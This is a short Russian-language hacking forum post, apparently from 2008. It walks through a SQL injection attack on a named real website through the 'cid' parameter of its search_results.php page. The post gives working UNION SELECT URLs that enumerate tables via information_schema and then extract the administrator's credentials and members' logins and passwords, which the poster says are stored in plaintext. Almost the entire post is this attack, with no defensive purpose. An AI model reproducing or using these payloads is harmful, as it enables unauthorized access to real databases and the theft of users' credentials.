08.09.2008, 09:24
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Сообщение от N1K70
Proover.Com
Код:
http://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--
=\\\
Интересно по нему лазить, раскрутил бы дальше 
Версия > 5 => узнаем пасс легко.
Код:
http://proover.com/search_results.php?cid=-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x457368705f6d656d62657273--
Тэкс, Es_pwd и admin_name то, что нас интересует.
Код:
http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_admin_name,0x3a,es_pwd)3,4,5,6+from+eshp_admin--
Получаем Admin:A
Полезли в мемберс:
Код:
http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_username,0x3a,es_password),3,4,5,6+from+eshp_members+limit+2,1--
И вот пошли логины с пассами.
Пассы открытые 
|
|
|